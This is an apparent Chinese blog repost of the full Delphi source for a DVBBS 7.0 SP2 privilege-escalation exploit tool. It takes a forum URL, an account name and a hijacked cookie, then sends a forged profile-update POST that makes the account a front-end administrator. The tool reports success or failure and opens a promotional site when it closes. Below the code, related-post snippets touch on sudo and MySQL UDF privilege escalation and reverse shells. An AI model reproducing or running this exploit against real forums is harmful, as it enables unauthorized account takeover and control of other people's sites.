DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

作者:Kendy 文章来源:Kendy’s Blog

unit Unit1;

interface

uses

Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,

Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi;

type

TForm1 = class(TForm)

  Label1: TLabel;

  Label2: TLabel;

  Label3: TLabel;

  Edit1: TEdit;

  Edit2: TEdit;

  Edit3: TEdit;

  Button1: TButton;

  ClientSocket1: TClientSocket;

  GroupBox1: TGroupBox;

  Memo1: TMemo;

  Label4: TLabel;

  StatusBar1: TStatusBar;

  SkinData1: TSkinData;

  procedure Button1Click(Sender: TObject);

  procedure ClientSocket1Connect(Sender: TObject;

   Socket: TCustomWinSocket);

  procedure ClientSocket1Read(Sender: TObject; Socket: TCustomWinSocket);

  procedure ClientSocket1Error(Sender: TObject; Socket: TCustomWinSocket;

   ErrorEvent: TErrorEvent; var ErrorCode: Integer);

  procedure FormClose(Sender: TObject; var Action: TCloseAction);

private

  { Private declarations }

public

  { Public declarations }

end;

var

Form1: TForm1;

 Data: string;

implementation

{$R *.dfm}

procedure TForm1.Button1Click(Sender: TObject);

var

sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;

i:integer;

begin

ClientSocket1.Close ;

if edit1.Text = ’’ then

begin

  StatusBar1.Panels[0].Text :=’请输入论坛地址!’;

  exit;

end;

if edit2.Text = ’’ then

begin

  StatusBar1.Panels[0].Text :=’请输入你的论坛账号!’;

  exit;

end;

if edit3.Text = ’’ then

begin

  StatusBar1.Panels[0].Text :=’请输入抓取的Cookie!’;

  exit;

end;

memo1.Text :=’’;

StatusBar1.Panels[0].Text :=’’;

Label4.Caption :=’’;

sUrl:=edit1.Text ;

if Pos(’http://’,sUrl) <> 0 then

  sUrl:=StringReplace(sUrl,’http://’,’’,[rfIgnoreCase]);

sUsername:=edit2.Text ;

sCookie:=edit3.Text ;

//--------Host-------------

i:=Pos(’/’,sUrl);

if i <> 0 then

  sHost:=Copy(sUrl,0,i-1)

else

  sHost:=sUrl;

//--------Referer-----------

sReferer:=’http://’ + sUrl + ’/mymodify.asp’;

//--------POST--------------

sPost:=StringReplace(sUrl,sHost,’’,[rfIgnoreCase]);

sPost:=sPost + ’/mymodify.asp?action=updat&username=’ + sUsername;

//--------数据包------------

S:=’sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%’;

S:=S+’2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||’;

S:=S+’0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0 ||||||Dvbbs&width=100&height=100’;

S:=S+’&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo’;

S:=S+’=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0’;

S:=S+’&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0’;

Data:=’POST ’+sPost+’ HTTP/1.1’+#13#10;

Data:=Data+’Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */*’+#13#10;

Data:=Data+’Referer: ’+sReferer+#13#10;

Data:=Data+’Accept-Language: zh-cn’+#13#10;

Data:=Data+’Content-Type: application/x-www-form-urlencoded’+#13#10;

Data:=Data+’Accept-Encoding: gzip, deflate’+#13#10;

Data:=Data+’User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon; TencentTraveler )’+#13#10;

Data:=Data+’Host: ’+sHost+#13#10;

Data:=Data+’Content-Length: 585’+#13#10;

Data:=Data+’Connection: Keep-Alive’+#13#10;

Data:=Data+’Cache-Control: no-cache’+#13#10;

Data:=Data+’Cookie: ’+ sCookie+#13#10+#13#10;

Data:=Data+S;

//--------开始发送数据包-------------

ClientSocket1.Host := sHost;

ClientSocket1.Port := 80;

ClientSocket1.Open ;

StatusBar1.Panels[0].Text :=’数据发送中...’;

end;

procedure TForm1.ClientSocket1Connect(Sender: TObject;

Socket: TCustomWinSocket);

begin

Socket.SendText(Data);

end;

procedure TForm1.ClientSocket1Read(Sender: TObject;

Socket: TCustomWinSocket);

begin

memo1.Text :=Socket.ReceiveText ;

if Pos(’您的修改信息已成功提交’,memo1.Text) <> 0 then

begin

  Label4.Caption :=’>>成功提升为前台管理员!’;

  StatusBar1.Panels[0].Text :=’成功,请重新登陆论坛!’;

end

else

begin

  Label4.Caption :=’>> Sorry,提权失败’;

  StatusBar1.Panels[0].Text :=’失败,换个论坛试试。’;

end;

end;

procedure TForm1.ClientSocket1Error(Sender: TObject;

Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;

var ErrorCode: Integer);

begin

ErrorCode:= 0;

StatusBar1.Panels[0].Text :=’Error.....’;

Exit;

end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);

begin

ShellExecute(Handle,’open’,’http://aliwy.77169.com’,nil,nil,SW_SHOW);

end;

end.

(0)

相关推荐

  • DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码

    作者:Kendy 文章来源:Kendy’s Blog unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, ScktComp, StdCtrls, ComCtrls, WinSkinData, ShellApi; type TForm1 = class(TForm)  Label1: TLabel;  Label2: TLabel

  • Linux曝出Sudo提权漏洞 任意用户亦可运行root命令

    作为 Linux 中最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令. 然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 -- 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令. (题图 via Hacker News ) 据悉,Sudo 特指"超级用户".作为一个系统命令,其允许用户以特殊权限来运行程序或命令,而无需

  • 微信小程序支付前端源码

    本文实例为大家分享了微信小程序支付前端源码,供大家参考,具体内容如下 //index.js Page({ data: { }, //点击支付按钮进行支付 payclick: function () { var t = this; wx.login({ //获取code换取openID success: function (res) { //code = res.code //返回code console.log("获取code"); console.log(res.code); var

  • 解析从小程序开发者工具源码看原理实现

    如何查看小程序开发者工具源码 下面我们通过微信小程序开发者工具的源码来说说小程序的底层实现原理.以开发者工具版本号State v1.02.1904090的源码来窥探小程序的实现思路.如何查看微信源码,对于mac用户而言,查看微信小程序开发者工具的包内容,然后进入Contents/Resources/app.nw/js/core/index.js,注释掉如下代码就可以查看开发者工具渲染后的代码. // 打开 inspect 窗口 if (nw.App.argv.indexOf('inspect')

  • phpwind管理权限泄露漏洞利用程序发布

    漏洞发布:http://www.80sec.com/  漏洞作者:jianxin@80sec.com  漏洞厂商: http://www.phpwind.com/ 本漏洞影响phpwind所有版本  漏洞危害:高  漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作 利用方式:http://www.80sec.com有提供exploit  漏洞分析:由于phpwind论坛在设计上对数据库存储机制不了解,导致

  • Django应用程序入口WSGIHandler源码解析

    前言 WSGI 有三个部分, 分别为服务器(server), 应用程序(application) 和中间件(middleware). 已经知道, 服务器方面会调用应用程序来处理请求, 在应用程序中有真正的处理逻辑, 在这里面几乎可以做任何事情, 其中的中间件就会在里面展开. Django 中的应用程序 任何的 WSGI 应用程序, 都必须是一个 start_response(status, response_headers, exc_info=None) 形式的函数或者定义了 __call__

  • c语言实现整蛊朋友小程序(附源码)

    前言 感觉学了c语言后仍然一无是处?!!想要整蛊一下朋友仍然不会?!! 别慌,看完这篇文章,你就会了. 下面给大家分享两个基础的整蛊小程序 1.我是猪关机程序 2.无限弹窗程序 一.我是猪关机程序 效果:运行程序后电脑在60s后关机,如果输入"我是猪"则取消关机:如果输入"你是猪"则立即关机:输入其他文字会提示重新输入:若强行关闭程序电脑仍会关机. 本程序基于控制台,其功能是通过dos命令来实现. 那么就先讲一下所用到的dos命令(shutdown -s -t 60

  • Mysql提权方法利用

    mysql是一个常用的数据库系统,应用极广泛,如果得到一个mysql的用户权限,如果提升呢,下面这个思路很先进! 但得有一定编程基础! 现在网上通过mysql获得系统权限大都通过MYSQL的用户函数接口UDF,比如Mix.dll和my_udf.dll.在Mix.dll中有一个MixConnect函数它会反弹shell,但是使用这个函数会造成MYSQL假死,前些天我就用这个函数反弹shell后由于网络原因不一会儿就断开了,造成了MYSQL当掉.my_udf.dll和Mix.dll相似,但它是通

  • .net+mssql制作抽奖程序思路及源码

    抽奖程序: 思路整理,无非就是点一个按钮,然后一个图片旋转一会就出来个结果就行了,可这个程序的要求不是这样的,是需要从数据库中随机抽取用户,根据数据库中指定的等级和人数,一键全部抽出来结果就行了.同时需要存储到数据库.还需要一个导出的功能. 不能遗漏的是,如果通过随机数根据id来抽取的话,需要考虑id不连续的问题,如果全部取出id也不现实.尽量少的去读写数据库. 数据库: 复制代码 代码如下: CREATE TABLE [dbo].[users](    [id] [int] IDENTITY(

  • 文件上传程序的全部源码

    1.upfile.php文件 <html> <body> <title>文件上传</title> <form enctype="multipart/form-data" action=upload.php method=post> <input type=file name=upfile size=10><br><br> <input type=submit value='上载文件'&

随机推荐